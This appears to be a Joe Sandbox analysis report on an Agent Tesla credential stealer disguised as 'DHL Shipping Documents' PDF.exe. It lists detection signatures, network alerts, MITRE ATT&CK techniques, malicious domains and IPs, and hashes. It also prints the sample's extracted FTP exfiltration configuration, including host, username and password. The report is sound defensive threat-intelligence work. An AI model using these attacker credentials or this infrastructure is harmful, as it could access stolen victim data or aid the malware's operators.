Windows
Analysis Report
DHL Shipping Documents 0016229753_PDF.exe
Overview
General Information
Detection
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
- System is w10x64
- DHL Shipping Documents 0016229753_PDF.exe (PID: 5836 cmdline:
"C:\Users\ user\Deskt op\DHL Shi pping Docu ments 0016 229753_PDF .exe" MD5: C9BEC29F669D714CD80E368748D7024C) - MSBuild.exe (PID: 5764 cmdline:
"C:\Window s\Microsof t.NET\Fram ework\v4.0 .30319\MSB uild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
- cleanup
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
Agent Tesla, AgentTesla | A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel. |
{"Exfil Mode": "FTP", "Host": "ftp://ftp.wapination.net", "Username": "pop@wapination.net", "Password": "sync@#1235"}
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security | ||
JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | ||
JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security | ||
JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | ||
JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security | ||
Click to see the 8 entries |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | ||
JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security | ||
INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID | Detects executables referencing Windows vault credential objects. Observed in infostealers | ditekSHen |
| |
MALWARE_Win_AgentTeslaV2 | AgenetTesla Type 2 Keylogger payload | ditekSHen |
| |
JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | ||
Click to see the 23 entries |
Timestamp: | 2024-08-02T15:02:16.556150+0200 |
SID: | 2855542 |
Source Port: | 49709 |
Destination Port: | 47808 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Timestamp: | 2024-08-02T15:02:12.198468+0200 |
SID: | 2803270 |
Source Port: | 49707 |
Destination Port: | 443 |
Protocol: | TCP |
Classtype: | Potentially Bad Traffic |
Timestamp: | 2024-08-02T15:02:10.477622+0200 |
SID: | 2803270 |
Source Port: | 49706 |
Destination Port: | 443 |
Protocol: | TCP |
Classtype: | Potentially Bad Traffic |
Timestamp: | 2024-08-02T15:02:16.550510+0200 |
SID: | 2855542 |
Source Port: | 49709 |
Destination Port: | 47808 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Timestamp: | 2024-08-02T15:02:16.074554+0200 |
SID: | 2029927 |
Source Port: | 49708 |
Destination Port: | 21 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Click to jump to signature section
AV Detection |
---|
Source: | Avira: |
Source: | Malware Configuration Extractor: |
Source: | ReversingLabs: |
Source: | Integrated Neural Analysis Model: |
Source: | HTTPS traffic detected: |
Source: | HTTPS traffic detected: |
Source: | Static PE information: |
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: |
Source: | TCP traffic: |
Source: | IP Address: | ||
Source: | IP Address: |
Source: | ASN Name: |
Source: | JA3 fingerprint: | ||
Source: | JA3 fingerprint: |
Source: | FTP traffic detected: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | HTTPS traffic detected: |
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: |
Source: | Code function: | 1_2_00007FF886E32072 |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: |
Source: | HTTPS traffic detected: |
Key, Mouse, Clipboard, Microphone and Screen Capturing |
---|
Source: | .Net Code: |
System Summary |
---|
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: |
Source: | Static PE information: |
Source: | Static file information: |
Source: | Code function: | 1_2_00007FF886E30FF2 | |
Source: | Code function: | 1_2_00007FF886E31750 | |
Source: | Code function: | 3_2_01359BC0 | |
Source: | Code function: | 3_2_01354A60 | |
Source: | Code function: | 3_2_0135CE50 | |
Source: | Code function: | 3_2_01353E48 | |
Source: | Code function: | 3_2_01354190 | |
Source: | Code function: | 3_2_060C56E8 | |
Source: | Code function: | 3_2_060C0040 | |
Source: | Code function: | 3_2_060C3F60 | |
Source: | Code function: | 3_2_060CDC30 | |
Source: | Code function: | 3_2_060CBD08 | |
Source: | Code function: | 3_2_060C9AE8 | |
Source: | Code function: | 3_2_060C2AF8 | |
Source: | Code function: | 3_2_060C8B88 | |
Source: | Code function: | 3_2_060C324B | |
Source: | Code function: | 3_2_060C5008 |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: |
Source: | Cryptographic APIs: | ||
Source: | Cryptographic APIs: | ||
Source: | Cryptographic APIs: | ||
Source: | Cryptographic APIs: | ||
Source: | Cryptographic APIs: | ||
Source: | Cryptographic APIs: | ||
Source: | Cryptographic APIs: | ||
Source: | Cryptographic APIs: |
Source: | Suspicious URL: |
Source: | Classification label: |
Source: | File created: | Jump to behavior |
Source: | Mutant created: |
Source: | Static PE information: |
Source: | Static file information: |
Source: | WMI Queries: | ||
Source: | WMI Queries: |
Source: | File read: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | ReversingLabs: |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | Static PE information: |
Source: | Static PE information: |
Source: | Static PE information: |
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: |
Data Obfuscation |
---|
Source: | .Net Code: |
Source: | Code function: | 1_2_00007FF886E31233 | |
Source: | Code function: | 1_2_00007FF886E31233 |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior |
Malware Analysis System Evasion |
---|
Source: | WMI Queries: |
Source: | Memory allocated: | Jump to behavior | ||
Source: | Memory allocated: | Jump to behavior | ||
Source: | Memory allocated: | Jump to behavior | ||
Source: | Memory allocated: | Jump to behavior | ||
Source: | Memory allocated: | Jump to behavior |
Source: | Thread delayed: | Jump to behavior |
Source: | Thread sleep time: | Jump to behavior |
Source: | WMI Queries: |
Source: | WMI Queries: | ||
Source: | WMI Queries: |
Source: | Thread delayed: | Jump to behavior |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | Process information queried: | Jump to behavior |
Source: | Process token adjusted: | Jump to behavior |
Source: | Memory allocated: | Jump to behavior |
HIPS / PFW / Operating System Protection Evasion |
---|
Source: | Memory allocated: | Jump to behavior |
Source: | Memory written: | Jump to behavior |
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior |
Source: | Process created: | Jump to behavior |
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Stealing of Sensitive Information |
---|
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Source: | Key opened: | Jump to behavior |
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior |
Source: | File opened: | Jump to behavior |
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | Key opened: | Jump to behavior | ||
Source: | Key opened: | Jump to behavior |
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Remote Access Functionality |
---|
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 121 Windows Management Instrumentation | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Disable or Modify Tools | 2 OS Credential Dumping | 1 File and Directory Discovery | Remote Services | 11 Archive Collected Data | 2 Ingress Tool Transfer | 1 Exfiltration Over Alternative Protocol | Abuse Accessibility Features |
Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 311 Process Injection | 1 Deobfuscate/Decode Files or Information | 1 Input Capture | 24 System Information Discovery | Remote Desktop Protocol | 2 Data from Local System | 11 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service |
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 1 Obfuscated Files or Information | 1 Credentials in Registry | 111 Security Software Discovery | SMB/Windows Admin Shares | 1 Email Collection | 1 Non-Standard Port | Automated Exfiltration | Data Encrypted for Impact |
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 Software Packing | NTDS | 1 Process Discovery | Distributed Component Object Model | 1 Input Capture | 2 Non-Application Layer Protocol | Traffic Duplication | Data Destruction |
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 141 Virtualization/Sandbox Evasion | SSH | Keylogging | 23 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact |
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Masquerading | Cached Domain Credentials | Wi-Fi Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 141 Virtualization/Sandbox Evasion | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 311 Process Injection | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
47% | ReversingLabs | ByteCode-MSIL.Trojan.Remcos | ||
100% | Avira | HEUR/AGEN.1314412 |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
wapination.net | 108.179.234.136 | true | true | unknown | |
investdirectinsurance.com | 172.67.189.102 | true | false | unknown | |
fp2e7a.wpc.phicdn.net | 192.229.221.95 | true | false | unknown | |
ftp.wapination.net | unknown | unknown | true | unknown |
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
false |
| unknown | |
false |
| unknown |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
108.179.234.136 | wapination.net | United States | 46606 | UNIFIEDLAYER-AS-1US | true | |
172.67.189.102 | investdirectinsurance.com | United States | 13335 | CLOUDFLARENETUS | false |
Joe Sandbox version: | 40.0.0 Tourmaline |
Analysis ID: | 1486782 |
Start date and time: | 2024-08-02 15:01:04 +02:00 |
Joe Sandbox product: | CloudBasic |
Overall analysis duration: | 0h 5m 44s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01 |
Number of analysed new started processes analysed: | 11 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Sample name: | DHL Shipping Documents 0016229753_PDF.exe |
Detection: | MAL |
Classification: | mal100.troj.spyw.evad.winEXE@3/3@2/2 |
EGA Information: |
|
HCA Information: |
|
Cookbook Comments: |
|
- Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
- Excluded IPs from analysis (whitelisted): 40.68.123.157, 192.229.221.95, 13.85.23.206, 72.247.153.162, 72.247.153.178
- Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, a767.dspw65.akamai.net, fe3cr.delivery.mp.microsoft.com, download.windowsupdate.com.edgesuite.net, fe3.delivery.mp.microsoft.com, ocsp.digicert.com, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net
- Not all processes where analyzed, report is missing behavior information
- Report size getting too big, too many NtOpenKeyEx calls found.
- Report size getting too big, too many NtQueryValueKey calls found.
- Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
- VT rate limit hit for: DHL Shipping Documents 0016229753_PDF.exe
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
108.179.234.136 | Get hash | malicious | AgentTesla, PureLog Stealer | Browse | ||
Get hash | malicious | AgentTesla, PureLog Stealer | Browse | |||
Get hash | malicious | AgentTesla | Browse | |||
Get hash | malicious | AgentTesla | Browse | |||
Get hash | malicious | AgentTesla | Browse | |||
Get hash | malicious | AgentTesla, PureLog Stealer | Browse | |||
Get hash | malicious | AgentTesla, PureLog Stealer | Browse | |||
Get hash | malicious | AgentTesla, PureLog Stealer, RedLine | Browse | |||
172.67.189.102 | Get hash | malicious | Unknown | Browse | ||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | FormBook | Browse | |||
Get hash | malicious | Snake Keylogger | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Remcos | Browse |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
investdirectinsurance.com | Get hash | malicious | Remcos | Browse |
| |
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | FormBook | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Snake Keylogger | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Remcos | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
fp2e7a.wpc.phicdn.net | Get hash | malicious | Unknown | Browse |
| |
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | Unknown | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
UNIFIEDLAYER-AS-1US | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| |
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| ||
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| ||
Get hash | malicious | FormBook | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | EvilProxy | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
CLOUDFLARENETUS | Get hash | malicious | AgentTesla | Browse |
| |
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| ||
Get hash | malicious | DCRat | Browse |
| ||
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| ||
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| ||
Get hash | malicious | MofongoLoader | Browse |
| ||
Get hash | malicious | AgentTesla | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
1138de370e523e824bbca92d049a3777 | Get hash | malicious | HTMLPhisher | Browse |
| |
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | TechSupportScam | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
37f463bf4616ecd445d4a1937da06e19 | Get hash | malicious | MofongoLoader | Browse |
| |
Get hash | malicious | BlackMoon | Browse |
| ||
Get hash | malicious | CobaltStrike, ReflectiveLoader | Browse |
| ||
Get hash | malicious | Vidar | Browse |
| ||
Get hash | malicious | LummaC | Browse |
| ||
Get hash | malicious | FormBook, GuLoader | Browse |
| ||
Get hash | malicious | AgentTesla, GuLoader | Browse |
| ||
Get hash | malicious | GuLoader, Lokibot | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
|
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\DHL Shipping Documents 0016229753_PDF.exe.log
Download File
Process: | C:\Users\user\Desktop\DHL Shipping Documents 0016229753_PDF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 425 |
Entropy (8bit): | 5.357964438493834 |
Encrypted: | false |
SSDEEP: | 12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khav:ML9E4KQwKDE4KGKZI6Khk |
MD5: | D8F8A79B5C09FCB6F44E8CFFF11BF7CA |
SHA1: | 669AFE705130C81BFEFECD7CC216E6E10E72CB81 |
SHA-256: | 91B010B5C9F022F3449F161425F757B276021F63B024E8D8ED05476509A6D406 |
SHA-512: | C95CB5FC32843F555EFA7CCA5758B115ACFA365A6EEB3333633A61CA50A90FEFAB9B554C3776FFFEA860FEF4BF47A6103AFECF3654C780287158E2DBB8137767 |
Malicious: | true |
